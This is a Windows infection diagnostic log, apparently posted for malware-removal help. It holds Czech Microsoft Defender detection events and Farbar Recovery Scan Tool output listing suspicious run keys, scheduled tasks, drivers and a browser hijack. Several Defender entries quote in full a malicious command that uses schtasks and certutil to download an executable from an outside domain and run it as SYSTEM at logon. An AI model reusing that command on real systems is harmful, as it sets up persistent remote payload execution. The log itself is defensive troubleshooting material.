Verze modulu: AM: 1.1.17500.4, NIS: 1.1.17500.4
Date: 2020-10-20 16:56:36.4060000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Ceprolad.A
ID: 2147726914
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.325.1105.0, AS: 1.325.1105.0, NIS: 1.325.1105.0
Verze modulu: AM: 1.1.17500.4, NIS: 1.1.17500.4
Date: 2020-10-20 16:53:27.5720000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Ceprolad.A
ID: 2147726914
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.325.1105.0, AS: 1.325.1105.0, NIS: 1.325.1105.0
Verze modulu: AM: 1.1.17500.4, NIS: 1.1.17500.4
Date: 2020-10-20 16:45:43.8350000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Ceprolad.A
ID: 2147726914
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.325.1105.0, AS: 1.325.1105.0, NIS: 1.325.1105.0
Verze modulu: AM: 1.1.17500.4, NIS: 1.1.17500.4
Date: 2020-10-20 16:42:01.0060000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Ceprolad.A
ID: 2147726914
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.325.1105.0, AS: 1.325.1105.0, NIS: 1.325.1105.0
Verze modulu: AM: 1.1.17500.4, NIS: 1.1.17500.4
Date: 2020-10-20 21:27:56.0780000Z
Description:
Antivirová ochrana v programu Microsoft Defender narazil na chybu při pokusu o aktualizaci bezpečnostních informací.
Nová verze bezpečnostních informací:
Předchozí verze bezpečnostních informací: 1.325.1105.0
Zdroj aktualizace: Centrum společnosti Microsoft pro ochranu před škodlivým softwarem
Typ bezpečnostních informací: Antivirový program
Typ aktualizace: Úplné
Uživatel: NT AUTHORITY\NETWORK SERVICE
Aktuální verze modulu:
Předchozí verze modulu: 1.1.17500.4
Kód chyby: 0x80072742
Popis chyby: Při operaci se sokety přestala pracovat síť.
Date: 2020-10-20 21:27:56.0750000Z
Description:
Antivirová ochrana v programu Microsoft Defender narazil na chybu při pokusu o aktualizaci bezpečnostních informací.
Nová verze bezpečnostních informací:
Předchozí verze bezpečnostních informací: 1.325.1105.0
Zdroj aktualizace: Centrum společnosti Microsoft pro ochranu před škodlivým softwarem
Typ bezpečnostních informací: Antispywarový program
Typ aktualizace: Úplné
Uživatel: NT AUTHORITY\NETWORK SERVICE
Aktuální verze modulu:
Předchozí verze modulu: 1.1.17500.4
Kód chyby: 0x80072742
Popis chyby: Při operaci se sokety přestala pracovat síť.
Date: 2020-10-20 21:27:56.0740000Z
Description:
Antivirová ochrana v programu Microsoft Defender narazil na chybu při pokusu o aktualizaci bezpečnostních informací.
Nová verze bezpečnostních informací:
Předchozí verze bezpečnostních informací: 1.325.1105.0
Zdroj aktualizace: Centrum společnosti Microsoft pro ochranu před škodlivým softwarem
Typ bezpečnostních informací: Antivirový program
Typ aktualizace: Úplné
Uživatel: NT AUTHORITY\NETWORK SERVICE
Aktuální verze modulu:
Předchozí verze modulu: 1.1.17500.4
Kód chyby: 0x80072742
Popis chyby: Při operaci se sokety přestala pracovat síť.
Date: 2020-10-20 21:27:56.0390000Z
Description:
Antivirová ochrana v programu Microsoft Defender narazil na chybu při pokusu o aktualizaci bezpečnostních informací.
Nová verze bezpečnostních informací:
Předchozí verze bezpečnostních informací: 1.325.1105.0
Zdroj aktualizace: Centrum společnosti Microsoft pro ochranu před škodlivým softwarem
Typ bezpečnostních informací: Antivirový program
Typ aktualizace: Úplné
Uživatel: NT AUTHORITY\NETWORK SERVICE
Aktuální verze modulu:
Předchozí verze modulu: 1.1.17500.4
Kód chyby: 0x80072742
Popis chyby: Při operaci se sokety přestala pracovat síť.
Date: 2020-10-20 21:27:56.0360000Z
Description:
Antivirová ochrana v programu Microsoft Defender narazil na chybu při pokusu o aktualizaci bezpečnostních informací.
Nová verze bezpečnostních informací:
Předchozí verze bezpečnostních informací: 1.325.1105.0
Zdroj aktualizace: Centrum společnosti Microsoft pro ochranu před škodlivým softwarem
Typ bezpečnostních informací: Antispywarový program
Typ aktualizace: Úplné
Uživatel: NT AUTHORITY\NETWORK SERVICE
Aktuální verze modulu:
Předchozí verze modulu: 1.1.17500.4
Kód chyby: 0x80072742
Popis chyby: Při operaci se sokety přestala pracovat síť.
==================== Memory info ===========================
BIOS: American Megatrends Inc. 0308 07/10/2007
Motherboard: ASUSTeK Computer INC. M2N-MX SE
Processor: AMD Athlon(tm) 64 X2 Dual Core Processor 4200+
Percentage of memory in use: 38%
Total physical RAM: 3071.36 MB
Available physical RAM: 1887.16 MB
Total Virtual: 6271.36 MB
Available Virtual: 5348.71 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:465.32 GB) (Free:298.64 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (KINGSTON) (Removable) (Total:14.44 GB) (Free:13.07 GB) FAT32
\\?\Volume{44cc5245-0000-0000-0000-a05474000000}\ () (Fixed) (Total:0.44 GB) (Free:0.1 GB) NTFS
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: 44CC5245)
Partition 1: (Active) - (Size=465.3 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=449 MB) - (Type=27)
==========================================================
Disk: 1 (Size: 14.5 GB) (Disk ID: 0D702AAC)
Partition 1: (Not Active) - (Size=14.5 GB) - (Type=0B)
==================== End of Addition.txt =======================
Ran by 42072 (administrator) on DESKTOP-4NQUTUE (20-10-2020 22:08:19)
Running from C:\Users\42072\Desktop
Loaded Profiles: 42072
Platform: Microsoft Windows 10 Pro Version 2004 19041.450 (X86) Language: Čeština (Česko)
Default browser: Edge
Boot Mode: Safe Mode (minimal)
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DTShellHlp.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\HelpPane.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2009.7-0\MsMpEng.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [StartCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\x86\CLIStart.exe [748744 2015-11-04] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
HKLM\...\Run: [LogMeIn Hamachi Ui] => C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe [5890504 2019-04-02] (LogMeIn, Inc. -> LogMeIn Inc.)
HKLM\...\Run: [seznam-listicka-distribuce] => C:\Program Files\Seznam.cz\distribution\szninstall.exe [1069296 2018-03-27] (Seznam.cz, a.s. -> )
HKLM\...\Run: [LogiOptions] => C:\Program Files\Logitech\LogiOptions\LogiOptions.exe [1718408 2020-04-27] (Logitech Inc -> Logitech, Inc.)
HKLM\...\Run: [Reflect UI] => C:\Program Files\Macrium\Common\ReflectUI.exe [6131976 2020-08-05] (Paramount Software UK Ltd -> Paramount Software UK Ltd)
HKLM\...\Run: [DiskFixer] => C:\Program Files\DiskFixer\DiskFixer.exe [247808 2019-07-04] () [File not signed] <==== ATTENTION
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [13868168 2018-05-07] (Logitech Inc -> Logitech Inc.)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [710264 2020-06-18] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [516608 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [516608 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [365672 2020-03-19] (AVB Disc Soft, SIA -> Disc Soft Ltd)
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [EpicGamesLauncher] => C:\Program Files\Epic Games\Launcher\Portal\Binaries\Win32\EpicGamesLauncher.exe [26028432 2020-07-03] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [Spotify] => C:\Users\42072\AppData\Roaming\Spotify\Spotify.exe [23220456 2020-07-05] (Spotify AB -> Spotify Ltd)
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [Mobigame Playstore] => C:\Program Files\MobiGame\playstore\playstore.exe [135680 2020-08-28] () [File not signed]
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [MuddyGlade] => C:\WINDOWS\rss\csrss.exe [4080640 2020-09-27] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [Web Companion] => C:\Program Files\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [rfxgnkvq] => "C:\Users\42072\izhfpkrf.exe"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [CloudNet] => C:\Users\42072\AppData\Roaming\16f618eaf6a0\16f618eaf6a0.exe [549376 2020-10-20] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [Steam] => C:\Program Files\Steam\steam.exe [3416352 2020-10-15] (Valve -> Valve Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\86.0.4240.75\Installer\chrmstp.exe [2020-10-09] (Google LLC -> Google LLC)
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0204B8D3-DE41-47BC-908C-4991B4B01C81} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\MpCmdRun.exe [460640 2020-10-10] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {035C66D3-3267-4413-8AA1-62DEE2FE48E5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [156104 2020-03-19] (Google LLC -> Google LLC)
Task: {18F6FB00-BC5E-40F2-B942-28C444FA801F} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [314544 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {204ECE63-4E6A-4770-A8E1-979A2508CEBF} - System32\Tasks\NvNgxUpdateCheckDaily_{2A68F03E-F03E-F03E-F03E-2A68F03EF03E} => C:\Users\42072\AppData\Roaming\fweigsc.exe <==== ATTENTION
Task: {431477B5-ED35-4340-8CAA-B6BB67524844} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [124632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {64A8F9E3-A3B3-4C83-BBEB-DBC19AC5FE37} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\MpCmdRun.exe [460640 2020-10-10] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {6AB4A925-F182-4226-B65D-EF244AAA012C} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [600784 2020-10-13] (Mozilla Corporation -> Mozilla Foundation)
Task: {786FA461-0DED-4BF7-9479-9BAA2E1587AC} - System32\Tasks\NvNgxUpdateCheckDaily_{A6B397E0-97E0-97E0-97E0-A6B397E097E0} => C:\Users\42072\AppData\Roaming\jgeigsc.exe <==== ATTENTION
Task: {847F1E03-98FC-4129-AA18-E7CDB55634DD} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [314544 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {9D1BEBE2-2DD4-4A25-A32C-B86C65CCDEAA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\MpCmdRun.exe [460640 2020-10-10] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {AD86ADA3-1803-4D49-9974-AC4B675E2828} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe [4080640 2020-09-27] () [File not signed] <==== ATTENTION
Task: {C22B2574-9B3A-4D68-868F-AE2834A8D1E1} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\MpCmdRun.exe [460640 2020-10-10] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {C4E5A3FD-EB6B-4D00-8FAD-EF74A2B6DC50} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(1): schtasks.exe -> /Change /TN "\MicrosoftEdgeUpdateTaskMachineCore" /ENABLE
Task: {C4E5A3FD-EB6B-4D00-8FAD-EF74A2B6DC50} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(2): schtasks.exe -> /Change /TN "\MicrosoftEdgeUpdateTaskMachineUA" /ENABLE
Task: {C4E5A3FD-EB6B-4D00-8FAD-EF74A2B6DC50} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(3): schtasks.exe -> /Change /TN "\AVAST Software\Gaming mode Task Scheduler recovery" /DISABLE
Task: {D5436AFF-CA8D-4256-81CB-5800BB0CDA01} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [156104 2020-03-19] (Google LLC -> Google LLC)
Task: {FFB214BF-B5AF-4129-AFD4-D5FE103A286B} - System32\Tasks\Time Trigger Task => C:\Users\42072\AppData\Local\9ed9efac-d91e-4bae-b8a6-b37bff330bfb\7DCE.exe <==== ATTENTION
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer] 84.16.96.225 84.16.96.2
Tcpip\..\Interfaces\{345663bd-b4f0-4a3c-9b78-46e31c76d760}: [DhcpNameServer] 84.16.96.225 84.16.96.2
Edge:
======
Edge DefaultProfile: Default
Edge Profile: C:\Users\42072\AppData\Local\Microsoft\Edge\User Data\Default [2020-10-20]
FireFox:
========
FF DefaultProfile: 5tautenb.default
FF ProfilePath: C:\Users\42072\AppData\Roaming\Mozilla\Firefox\Profiles\5tautenb.default [2020-09-11]
FF NewTab: Mozilla\Firefox\Profiles\5tautenb.default -> hxxps://securesearch.org/homepage?hp=2&pId=BC180101&iDate=2020-09-11 04:31:44&bName=
FF ProfilePath: C:\Users\42072\AppData\Roaming\Mozilla\Firefox\Profiles\h2n5v0bu.default-release-1570206046342 [2020-10-20]
FF Homepage: Mozilla\Firefox\Profiles\h2n5v0bu.default-release-1570206046342 -> hxxps://securesearch.org/homepage?hp=2&pId=BC180101&iDate=2020-09-11 04:31:44&bName=
FF NewTab: Mozilla\Firefox\Profiles\h2n5v0bu.default-release-1570206046342 -> hxxps://securesearch.org/homepage?hp=2&pId=BC180101&iDate=2020-09-11 04:31:44&bName=
FF Notifications: Mozilla\Firefox\Profiles\h2n5v0bu.default-release-1570206046342 -> hxxps://mail.google.com; hxxps://uhta.getedicta.info
FF Extension: (Greasemonkey) - C:\Users\42072\AppData\Roaming\Mozilla\Firefox\Profiles\h2n5v0bu.default-release-1570206046342\Extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi [2020-10-09]
FF Plugin: @java.com/DTPlugin,version=11.261.2 -> C:\Program Files\Java\jre1.8.0_261\bin\dtplugin\npDeployJava1.dll [2020-10-10] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.261.2 -> C:\Program Files\Java\jre1.8.0_261\bin\plugin2\npjp2.dll [2020-10-10] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default [2020-10-20]
CHR Extension: (Prezentace) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-03-19]
CHR Extension: (Dokumenty) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2020-03-19]
CHR Extension: (Disk Google) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-03-19]
CHR Extension: (Seznam doplněk - Email) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\bgjpfhpjcgdppjbgnpnjllokbmcdllig [2020-09-12]
CHR Extension: (YouTube) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-03-19]
CHR Extension: (Tabulky) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-03-19]
CHR Extension: (d8yI+Hf7rX) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\fhiginakogfjlgjcgmcnahlmfllhicoe [2020-09-11]
CHR Extension: (Dokumenty Google offline) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-09-12]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-03-19]
CHR Extension: (Seznam doplněk - Esko) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\olfeabkoenfaoljndfecamgilllcpiak [2020-09-12]
CHR Extension: (Gmail) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-03-19]
CHR Extension: (Chrome Media Router) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-10-10]
CHR Profile: C:\Users\42072\AppData\Local\Google\Chrome\User Data\Guest Profile [2020-10-10]
CHR Profile: C:\Users\42072\AppData\Local\Google\Chrome\User Data\System Profile [2020-10-10]
CHR HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bgjpfhpjcgdppjbgnpnjllokbmcdllig]
CHR HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [olfeabkoenfaoljndfecamgilllcpiak]
Opera:
=======
OPR Extension: (book_helper) - C:\Users\42072\AppData\Roaming\Opera Software\Opera Stable\Extensions\fhiginakogfjlgjcgmcnahlmfllhicoe [2020-09-11]
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S2 AegLauncher; C:\Program Files\MobiGame\aeg_launcher.exe [6312448 2020-08-28] () [File not signed]
S2 AMD External Events Utility; C:\WINDOWS\system32\atiesrxx.exe [223216 2015-12-16] (Microsoft Windows Hardware Compatibility Publisher -> AMD)
S2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [284872 2015-11-04] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [4069992 2020-03-19] (AVB Disc Soft, SIA -> Disc Soft Ltd)
S3 EasyAntiCheat; C:\Program Files\EasyAntiCheat\EasyAntiCheat.exe [802432 2020-10-11] (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
S2 Hamachi2Svc; C:\Program Files\LogMeIn Hamachi\hamachi-2.exe [2243528 2019-04-02] (LogMeIn, Inc. -> LogMeIn Inc.)
S2 LMIGuardianSvc; C:\Program Files\LogMeIn Hamachi\LMIGuardianSvc.exe [405424 2016-05-27] (LogMeIn, Inc. -> LogMeIn, Inc.)
S2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [175240 2018-05-07] (Logitech Inc -> Logitech Inc.)
S2 MacriumService; C:\Program Files\Macrium\Common\MacriumService.exe [5996880 2020-08-05] (Paramount Software UK Ltd -> Paramount Software UK Ltd)
S2 MobiGameUpdater; C:\Program Files\MobiGame\MobiGameUpdater.exe [256000 2020-08-28] () [File not signed]
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3918680 2020-09-03] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\NisSrv.exe [1516320 2020-10-10] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\MsMpEng.exe [86088 2020-10-10] (Microsoft Windows Publisher -> Microsoft Corporation)
S2 WinDefender; C:\WINDOWS\windefender.exe [1987072 2020-09-11] () [File not signed]
S2 ekrn; "C:\Program Files\ESET\ESET Security\ekrn.exe" [X]
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S1 16F618EAF6A0; C:\WINDOWS\16F618EAF6A0.sys [21784 2020-09-11] (大连纵梦网络科技有限公司 -> FsFilter Network) [File not signed]
S3 amdkmdag; C:\WINDOWS\system32\DRIVERS\atikmdag.sys [19525104 2015-12-16] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.)
S3 amdkmdap; C:\WINDOWS\system32\DRIVERS\atikmpag.sys [542192 2015-12-16] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.)
R3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [38672 2020-03-19] (AVB Disc Soft, SIA -> Disc Soft Ltd)
R3 dtliteusbbus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [51680 2020-03-19] (AVB Disc Soft, SIA -> Disc Soft Ltd)
S3 Hamachi; C:\WINDOWS\System32\drivers\Hamdrv.sys [38512 2019-04-02] (Microsoft Windows Hardware Compatibility Publisher -> LogMeIn Inc.)
R3 LGBusEnum; C:\WINDOWS\system32\drivers\LGBusEnum.sys [32912 2018-05-07] (Logitech Inc -> Logitech Inc.)
S2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [13672 2015-06-21] (Logitech -> Logitech)
R3 LGJoyXlCore; C:\WINDOWS\system32\drivers\LGJoyXlCore.sys [63632 2018-05-07] (Logitech Inc -> Logitech Inc.)
S3 LGVirHid; C:\WINDOWS\system32\drivers\LGVirHid.sys [24856 2018-05-07] (Logitech Inc -> Logitech Inc.)
S1 MobiVBoxDrv; C:\Program Files\MobiGame\vbox\MobiVBoxDrv.sys [255640 2020-08-11] (Iron Entertainment Inc. -> Oracle Corporation)
S2 SecDrv; C:\WINDOWS\system32\drivers\SECDRV.SYS [28400 2020-09-25] () [File not signed]
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [39304 2020-10-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [332008 2020-10-10] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [49376 2020-10-10] (Microsoft Windows -> Microsoft Corporation)
S3 Winmon; C:\WINDOWS\System32\drivers\Winmon.sys [7248 2020-09-11] (WDKTestCert Admin,131480495282941941 -> ) [File not signed]
S3 WinmonFS; C:\WINDOWS\System32\drivers\WinmonFS.sys [18616 2020-09-11] (WDKTestCert Admin,131480495282941941 -> Windows (R) Win 7 DDK provider) [File not signed]
S1 WinmonProcessMonitor; C:\WINDOWS\System32\drivers\WinmonProcessMonitor.sys [28368 2020-09-11] (WDKTestCert Admin,131666266076831434 -> ) [File not signed] <==== ATTENTION
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) ===================
(If an entry is included in the fixlist, the file/folder will be moved.)
2020-10-20 22:08 - 2020-10-20 22:09 - 000018954 _____ C:\Users\42072\Desktop\FRST.txt
2020-10-20 22:08 - 2020-10-20 22:08 - 000000000 ____D C:\FRST
2020-10-20 22:07 - 2020-10-20 22:07 - 002013696 _____ (Farbar) C:\Users\42072\Desktop\FRST.exe
2020-10-20 21:26 - 2020-10-20 21:26 - 000000000 ____D C:\rsit
2020-10-20 21:26 - 2020-10-20 21:26 - 000000000 ____D C:\Program Files\trend micro
2020-10-20 16:52 - 2020-10-20 21:18 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2020-10-20 16:51 - 2020-10-20 16:51 - 000000000 ____D C:\WINDOWS\pss
2020-10-20 16:38 - 2020-10-20 16:46 - 000000000 ____D C:\Program Files\ESET
2020-10-20 16:34 - 2020-10-20 16:34 - 006333872 _____ (ESET) C:\Users\42072\Downloads\eset_internet_security_live_installer.exe
